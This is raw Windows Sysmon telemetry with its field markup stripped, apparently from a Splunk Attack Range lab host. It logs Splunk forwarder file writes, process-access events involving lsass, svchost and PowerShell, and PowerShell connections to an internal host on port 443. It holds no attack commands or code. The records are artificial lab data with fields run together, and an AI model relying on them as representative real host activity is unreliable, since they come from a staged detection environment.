Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C1710262484491B851809B0ECA6B70C,SHA256=44581F78C7ED7AC42EEEEA2D3D83886F0E1E035F3B34962E161093E3F6E2F316,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.786{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5EAA80EFD364FC0DF3C75F6D0925762,SHA256=D0E262AD695D85C115592903B31E141490549168867884250191AE41B2963B68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.638{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B323BAFF60BCFFB5A95DEAA9C31A1ECD,SHA256=D0CB241346DEA6671312EA0C04BE5A331255D35D4611C9DE392B4F5FC8BD913B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.537{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A278-6140-BB56-04000000C801}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.535{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.535{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.535{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.534{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.534{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A278-6140-BB56-04000000C801}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.534{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A278-6140-BB56-04000000C801}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.518{B81B27B7-A278-6140-BB56-04000000C801}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:36.845{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50697-false10.0.1.12-8000- 10341000x800000000000000036498834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:08.003{B81B27B7-A277-6140-BA56-04000000C801}16245388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:09.800{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AE24ACAC1E4A4487B86506B01972342,SHA256=ABA269ADF44E233A460DC021E9AB92655A1D67AD9B6F51AE1F4C92EDE02ED97A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:10.816{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F32DB2E2C1E32C262E92C67CA71B82A,SHA256=2F2F8812B2932B5D848DFB9809AD3EE5BD5FBBB4ED458CA75C2331E21D2CD6F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:39.312{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50698-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:11.833{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CAA1997E8B3990395B11605B20741BE,SHA256=58DEAFFBDDDDE780FB4D04ECAC3BC799975A4CF2FC800C1771A12DDD8102D760,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:12.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=36B757256AA66C3C9E338339FF2340FD,SHA256=C558994E395E3F47711A3D301313CB42938C808E5D2984960DD33497F4451618,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:12.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF0FB39522DA96134C0F6FEE4DCB8B94,SHA256=A2357BA652C1EBF93946FF10BAD127D1433C9A13874FAB0B850C93246874023C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:13.853{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00F9EC63BCF7AB5C73048E56BFD9A94E,SHA256=8CA97315A505E790EA0FE0A98892C3E99C3D616E574E1E3CA20934F9D6ABDFF9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:42.876{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50699-false10.0.1.12-8000- 23542300x800000000000000036498857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:14.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A92AA9A816025DCB984E66131E606F5A,SHA256=78AA295BC6D563336A5DAA513848E4F16336545DD551E113DA95A747FBD8C81E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:43.324{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50700-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:15.981{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF8ADB7DEEE6C4755A541EF33C5A6EF,SHA256=0A2E40913D3D657D14C13E1277E3B9C5CE94796BBF57FD3A7F6EE0F28E81AB76,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:16.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=541472690E97A63C9E9974C977814273,SHA256=710B453342FD2AC9D5F97ECFABB1DDE5239EA743AEE62D88B97AB13464AD11CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:16.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BAC851965AAB30B7D6561478D9754EDA,SHA256=3B5061DC5644C50F131CEB9AD7E92CF16B8F8284D42A59DD0B093293947AF985,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:47.343{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50701-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:47.905{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50702-false10.0.1.12-8000- 23542300x800000000000000036498862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:18.010{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35F4FAD5877A27FB3576745AAE71D996,SHA256=56FDBDCA3128985D922240ECAA467B5C29F2BEF0C2AED27B8288FF687A8A5C85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.755{B81B27B7-A283-6140-BD56-04000000C801}6488ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.718{B81B27B7-4013-611D-1600-00000000C801}11962844C:\Windows\system32\svchost.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.718{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.671{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.671{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000036498885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-14 13:24:19.655{B81B27B7-A283-6140-BD56-04000000C801}6488\PSHost.132760994595906744.6488.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000036498884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.639{B81B27B7-A283-6140-BD56-04000000C801}6488ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_s14gkgzn.vle.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.639{B81B27B7-A283-6140-BD56-04000000C801}6488ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_maiq1hrv.5rm.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000036498882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.639{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_maiq1hrv.5rm.ps12021-09-14 13:24:19.639 10341000x800000000000000036498881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.618{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.586{B81B27B7-6639-6125-B100-01000000C801}65365024C:\Windows\system32\conhost.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.586{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 